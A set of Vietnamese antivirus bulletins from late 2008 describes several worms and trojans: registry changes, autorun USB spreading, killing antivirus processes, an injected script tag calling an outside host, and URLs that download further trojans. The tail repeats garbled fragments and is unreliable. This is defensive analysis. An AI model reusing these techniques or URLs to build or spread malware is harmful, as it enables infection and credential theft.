o yassistse  Dừng các process của các chương trình : o VsTskMgr.exe o naPrdMgr.exe o UpdaterUI.exe o TBMon.exe o scan32.exe o Ravmond.exe o CCenter.exe o RavTask.exe o Rav.exe o Ravmon.exe o RavmonD.exe o RavStub.exe o KVXP.kxp o KvMonXP.kxp o KVCenter.kxp o KVSrvXP.exe o KRegEx.exe o UIHost.exe o TrojDie.kxp o FrogAgent.exe o Logo1_.exe o Logo_1.exe o Rundl123.exe  Tạo file Desktop_.ini ghi lại ngày giờ virus được kích hoạt lần đầu tiên vào tất cả các thư mục. Chuyên viên phân tích: Tô Đình Hiệp Một số malware đáng chú ý cập nhật cùng ngày: W32.FakeAntiDKX.Adware, W32.FakeBRA.Adware, W32.FakeBRB.Adware, W32.FakeLXUA.Adware, W32.KavoDGXY.Worm, W32.SecretDVB.Worm, W32.SillyPF.Worm, W32.MpconZX.Trojan, W32.VserverZX.Trojan, W32.FialaKE.Worm Bkav2025 - Phát hành lần thứ 1 ngày 29/11/2008, cập nhật NTRootI, RejanH, KavoFGS, DashferML, XPackK Malware cập nhật mới nhất:  Tên malware: W32. DashferML.PE  Thuộc họ: W32.Dashfer.PE  Loại: PE  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 28/11/2008  Kích thước: 165Kb  Mức độ phá hoại: Cao Nguy cơ:  Làm giảm mức độ an ninh của hệ thống. Hiện tượng:  Sửa registry.  Không vào được chế độ safe mode của Windows.  Xuất hiện popup các trang web tiếng Trung Quốc.  Mất checkbox để hiển thị các file hệ thống. Cách thức lây nhiễm:  Phát tán qua trang web.  Tự động lây nhiễm qua USB.  Lây qua các file thực thi. Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại  Không nên mở ổ USB bằng cách nháy kép vào biểu tượng ổ đĩa. Mô tả kỹ thuật:  Xóa các key : HKLM\ \Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1- 08002BE10318} HKLM\ \Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1- 08002BE10318} làm cho máy tính không khởi động được trong chế độ safemode. HKLM\Software\Microsoft\Windows\CurrentVersion\Run  Copy bản thân thành file có tên "lsass.exe" vào thư mục %SysDir%\Com, và ~.exe vào thư mục Startup để virus được thực thi khi khởi đông hệ thống.  Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.  Dump ra các file : %SysDir%\Com\smss.exe %SysDir%\Com\netcfg.dll %SysDir%\Com\netcfg.000 %SysDir%\Drivers\Alg.exe  Sửa key làm mất checkbox để hiển thị các file hệ thống.  Copy bản thân thành file có tên : "pagefile.pif" kèm theo file autorun.inf vào tất cả các ổ đĩa.  Tắt các process có chứa một trong các xâu sau : rav, avp, twister, kv, watch, kissvc, scan, guard.  Thêm vào cuối các file có đuôi: jsp, php, spx, asp, tml, htm tìm thấy trên máy trừ ổ đĩa hệ thống (kể cả trong các file nén .rar) đoạn script : <script "http://js.k01[removed].com/01.asp"></script>  Lây nhiễm vào các file thực thi tìm được trong máy trừ ổ đĩa hệ thống. Chuyên viên phân tích : Nguyễn Ngọc Dũng Bkav2038 (05/12/2008) cập nhật lần thứ 1: Cryptic, VtLikeAA Malware cập nhật mới nhất:  Tên malware: W32.AmvoDYBA.Worm  Thuộc họ: W32.Amvo.Worm  Loại: Worm  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 04/12/2008  Kích thước:108Kb  Mức độ phá hoại: Cao Nguy cơ:  Ăn cắp thông tin cá nhân.  Làm giảm mức độ an ninh của hệ thống. Hiện tượng:  Thay đổi registry. Cách thức lây nhiễm:  Tự động lây nhiễm vào USB.  Phát tán qua các trang web độc hại. Cách phòng tránh:  Không nên mở các ổ USB mới chưa được quét virus bằng cách nháy kép vào ổ đĩa.  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại. Mô tả kỹ thuật:  Copy chính nó thành các file sau: o %Sysdir%\\amvo.exe  Tạo các file sau: o %Userdir%\Local Settings\Temp\9sky8pia.dll o %Userdir%\Local Settings\Temp\4.sys o %Userdir%\Local Settings\Temp\help.exe o %Sysdir%\amvo0.dll  Ghi key sau để tự động kích hoạt virus khi khởi động máy tính: o HKCU\Software\Microsoft\Windows\CurrentVersion\Run\amva  Tìm các ổ đĩa cứng, usb và copy chính nó thành file qwc.exe, ghi thêm file autorun.inf để virus lây lan. Chuyên viên phân tích: Nguyễn Công Cường Một số malware đáng chú ý cập nhật cùng ngày: W32.SpyOnlineF.Trojan, W32.Wikservice.Trojan, W32.AntiV2009.Adware, W32.OngameC1AA.Trojan, W32.MmvoPNM.Worm, W32.LibLoader.PE, W32.Xiny.PE, W32.KamsoftRC.Worm, W32.Rs32netTB.Trojan, W32.Anti08BH.Worm, W32.Detxel.Trojan Bkav2045 - Phát hành lần thứ 2 ngày 09/12/2008, cập nhật SysManA, Themiser, XpShellA, FakeUserAA, SecretAAB Malware cập nhật mới nhất:  Tên malware: W32.FakeUserAA.Trojan  Thuộc họ: W32.FakeUser.Trojan  Loại: Trojan  Xuất xứ: Nước ngoài  Ngày phát hiện mẫu: 09/12/2008  Kích thước: 24Kb  Mức độ phá hoại: Cao Nguy cơ:  Làm giảm mức độ an ninh của hệ thống. Hiện tượng:  Sửa registry. Cách thức lây nhiễm:  Phát tán qua trang web.  Do trojan khác download về. Cách phòng tránh:  Không nên vào các trang web cung cấp các phần mềm crack, hack, các trang web đen, độc hại Mô tả kỹ thuật:  Ghi đè virus lên file userinit.exe của Windows để virus được kích hoạt mỗi khi Win khởi động  Tạo mutex : MICK_DOWNLOAD_MUTEX để chỉ 1 trojan cùng loại chạy trên 1 máy.  Download dk.txt từ đường link : http://www.d[removed]tdt.net/dk.txt File này chứa rất nhiều link download các trojan khác : http://png1.gacxz.net/soft0.exe http://png1.gacxz.net/soft1.exe http://png1.gacxz.net/soft33.exe Chuyên viên phân tích : Nguyễn Công Cường Bkav2050 - Phát hành lần thứ 1 ngày 11/12/2008, cập nhật DrDevic, FialaLC, LogoOneKC, VbsSowar, SecretRockD Malware cập nhật mới nhất:  Tên malware: W32.FialaLC.Worm  Thuộc họ: W32.Fiala.Worm  Loại: Worm  Xuất xứ: Trung Quốc  Ngày phát hiện mẫu: 11/12/2008  Kích thước: 15Kb  Mức độ phá hoại: Cao Nguy cơ:  Làm giảm mức độ an ninh của hệ thống.  Bị ăn cắp mật khẩu tài khoản Game Online. . thư mục %SysDir%Com, và ~.exe vào thư mục Startup để virus được thực thi khi khởi đông hệ thống.  Tạo Mutex: CNJBlaipbofF để chỉ 1 file virus chạy trên 1 máy.  Dump ra các file : %SysDir%Comsmss.exe. hoạt virus khi khởi động máy tính: o HKCUSoftwareMicrosoftWindowsCurrentVersionRunamva  Tìm các ổ đĩa cứng, usb và copy chính nó thành file qwc.exe, ghi thêm file autorun.inf để virus. phần mềm crack, hack, các trang web đen, độc hại Mô tả kỹ thuật:  Ghi đè virus lên file userinit.exe của Windows để virus được kích hoạt mỗi khi Win khởi động  Tạo mutex : MICK_DOWNLOAD_MUTEX